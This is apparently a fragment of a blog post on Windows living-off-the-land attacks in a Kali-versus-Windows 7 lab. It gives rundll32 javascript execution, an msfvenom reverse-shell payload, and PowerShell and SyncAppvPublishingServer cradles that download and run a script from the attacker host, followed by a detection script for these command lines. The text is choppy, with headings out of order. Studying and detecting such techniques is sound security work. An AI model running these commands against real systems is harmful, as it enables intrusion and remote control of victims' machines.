rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

Scripting

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

VBS: generate VBS code

Bat: generate a .bat batch file

Execute on the target host.

Empire obtains the agent successfully.

Execute system commands.

2. JScript

https://gist.github.com/homjxi0e/0d683007bd4a3ce39d3e19342aaa68ec

SyncAppvPublishingServer

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

1. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.100.19.19 LPORT=4444 -f psh-reflection > 4444.ps1

2. SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://10.100.19.19/4444.ps1');4444.ps1 | IEX"

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.100.19.19/4444.ps1');4444.ps1"

Not reproduced successfully.
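Process-creation triage over the command lines collected in the sections above (cmstp, regsvr32, rundll32, mshta, msiexec, forfiles, pcalua, IEExec, InstallUtil, regsvcs/regasm, InfDefaultInstall, SyncAppvPublishingServer and the PowerShell download cradles). Added example, not part of the original post: the records are constructed Sysmon-style (UtcTime, Image, CommandLine) tuples modelled on the post's commands, with 192.0.2.10 standing in for the lab host, and the rule names are assumed.

```python
import re

# (rule, image basename pattern, command-line pattern), matched case-insensitively.
# Each rule is keyed on the argument shape of one invocation shown in this post.
RULES = [
    ("cmstp_inf_install",      r"cmstp\.exe",                    r"/s\b.*\.inf\b|\.inf\b.*/s\b"),
    ("regsvr32_remote_sct",    r"regsvr32\.exe",                 r"/i:\s*https?://.*\bscrobj\.dll"),
    ("rundll32_javascript",    r"rundll32\.exe",                 r"\bjavascript:"),
    ("mshta_remote_hta",       r"mshta\.exe",                    r"https?://"),
    ("msiexec_remote_package", r"msiexec\.exe",                  r"/i\s+https?://"),
    ("forfiles_exec",          r"forfiles\.exe",                 r"(^|\s)/c\b"),
    ("pcalua_launch",          r"pcalua\.exe",                   r"(^|\s)-a\b"),
    ("ieexec_remote",          r"ieexec\.exe",                   r"https?://"),
    ("installutil_uninstall",  r"installutil\.exe",              r"(^|\s)/u\b"),
    ("regsvcs_regasm_dll",     r"reg(svcs|asm)\.exe",            r"\.dll\b"),   # audit-level
    ("infdefaultinstall",      r"infdefaultinstall\.exe",        r"\.inf\b"),
    ("syncappv_psh_cradle",    r"syncappvpublishingserver\.exe", r"new-object|\biex\b"),
    ("powershell_cradle",      r"powershell\.exe",               r"downloadstring|\biex\b|invoke-expression"),
]

def classify(image, cmdline):
    """Names of every rule matching one process-creation record."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1]
    return [rule for rule, img_re, cmd_re in RULES
            if re.fullmatch(img_re, name, re.I) and re.search(cmd_re, cmdline, re.I)]

def triage_events(events):
    """events: iterable of (utc_time, image, command_line); returns (time, hits) for hits only."""
    out = []
    for when, image, cmdline in events:
        hits = classify(image, cmdline)
        if hits:
            out.append((when, hits))
    return out

# Constructed Sysmon-style records (UtcTime, Image, CommandLine) modelled on the
# commands in this post; 192.0.2.10 is a documentation address, not the lab host.
SAMPLE_EVENTS = [
    ("2021-03-06 13:32:01.001", r"C:\Windows\System32\cmstp.exe",
     r"cmstp.exe /s cmstp.inf"),
    ("2021-03-06 13:32:02.002", r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /u /n /s /i:http://192.0.2.10:3333/file.sct scrobj.dll"),
    ("2021-03-06 13:32:03.003", r"C:\Windows\System32\mshta.exe",
     r"mshta.exe http://192.0.2.10:80/1.hta"),
    ("2021-03-06 13:32:04.004", r"C:\Windows\System32\msiexec.exe",
     r"msiexec /q /i http://192.0.2.10/calc.png"),
    ("2021-03-06 13:32:05.005", r"C:\Windows\System32\forfiles.exe",
     r"forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"),
    ("2021-03-06 13:32:06.006", r"C:\Windows\System32\rundll32.exe",
     r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";window.close();'),
    ("2021-03-06 13:32:07.007", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/x.ps1')"),
    # Benign look-alikes that must not fire:
    ("2021-03-06 13:40:00.000", r"C:\Windows\System32\msiexec.exe",
     r"msiexec /i C:\installers\tool.msi /qn"),
    ("2021-03-06 13:40:01.000", r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s C:\Windows\System32\vbscript.dll"),
]
```

The regsvcs/regasm rule fires on any DLL registration and is only useful as an audit baseline; the other rules key on the remote-URL or script arguments the invocations above depend on.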

 

Trusted Developer Utilities

40. WMI (T1047)


Source: https://blog.csdn.net/weixin_43650289/article/details/113529924
